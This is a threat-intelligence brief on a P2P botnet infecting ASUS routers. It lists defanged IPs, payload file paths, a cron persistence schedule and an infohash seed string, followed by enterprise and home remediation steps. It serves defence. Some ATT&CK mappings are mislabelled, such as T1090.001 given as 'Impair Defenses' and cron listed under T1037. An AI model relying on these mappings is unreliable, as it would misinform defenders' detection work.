Technical Analysis & Remediation
MITRE ATT&CK Mapping
T1037
(Boot or Logon Initialization Scripts) - Persistence via cron jobs.
T1090.001
(Impair Defenses: Disable or Modify Tools) - Closes port 22 via iptables.
T1095
(Non-Application Layer Protocol) - Custom Kademlia DHT communication.
T1090.002
(Proxy: External Proxy) - Traffic routed via the Doppelganger service.
CVE Profile
Unknown / NVD Score: N/A
[CISA KEV Status: Inactive/Unknown].
The delivery vector (The Origin) is currently undefined in the provided telemetry; classified as "Origin: Insufficient Evidence."
Telemetry
IPs
212.104.141[.]140
(Initial Payload Server)
45.135.180[.]38
(Persistent DHT Node)
45.135.180[.]177
(Persistent DHT Node)
Files/Paths
aic.sh
/jffs/.asusrouter
kad (ELF binary)
fwr.sh
/tmp/.sose
Artifacts
The script sets up a cron job to execute at the 55-minute mark of every hour to download aic.sh and rename it to /jffs/.asusrouter. The ELF payload generates a custom infohash using the hardcoded string XORed with NTP server time data and system uptime.
"6YL5aNSQv9hLJ42aDKqmnArjES4jxRbfPTnZDdBdpRhJkHJdxqMQmeyCrkg2CBQg"
Constraint
The structure resembles a highly modular botnet, where the initial script bootstraps the host, the ELF binary establishes P2P communications, and secondary payloads (fwr.sh, .sose) fortify the node and assign C2 endpoints.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command
Audit hardware inventory and supply chain policies for all SOHO/edge routers deployed to remote workers.
DETECT (DE) – Monitoring & Analysis
Command
Query SIEM and edge firewalls for outbound connections to 212.104.141[.]140, 45.135.180[.]38, and 45.135.180[.]177.
Command
Monitor network flow logs for endpoints reaching out to public BitTorrent trackers or exhibiting high-volume P2P DHT traffic.
RESPOND (RS) – Mitigation & Containment
Command
Block the identified initial payload server and persistent DHT node IP addresses at the perimeter WAF and proxy layers.
Command
Isolate VPN connections originating from known infected residential IPs executing password spraying or anomalous authentication attempts.
RECOVER (RC) – Restoration & Trust
Command
Force a hard factory reset and firmware re-flash of any suspected corporate-owned ASUS edge networking gear.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command
Deprecate and replace any edge devices that have reached manufacturer end-of-life (EOL) and enforce strong, non-default administrative credentials.
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command
Disconnect from the internet immediately. (Condition Met: If currently utilizing an ASUS router matching these IoCs).
Command
Do not log into banking/email until verified clean.
Priority 2: Identity
Command
Reset administrative passwords for the router management interface using a known clean device (e.g., phone on 5G).
Priority 3: Persistence
Command
Perform a hard factory reset of the ASUS router to clear malicious payloads from the /jffs and /tmp partitions.
Command
Update the router to the latest manufacturer firmware, disable remote management on the WAN interface, and routinely reboot the device.
Hardening & References
Baseline
CIS Benchmarks for Network Devices.
Framework
NIST CSF 2.0 / SP 800-61r3.
Reference
DHS CISA Binding Operational Directive (BOD) 23-02 on securing networking equipment.
Source
Lumen Black Lotus Labs
BleepingComputer
WrtHug Exploits Six ASUS WRT Flaws to Hijack Tens of Thousands of EoL Routers Worldwide
Mozi malware botnet goes dark after mysterious use of kill-switch
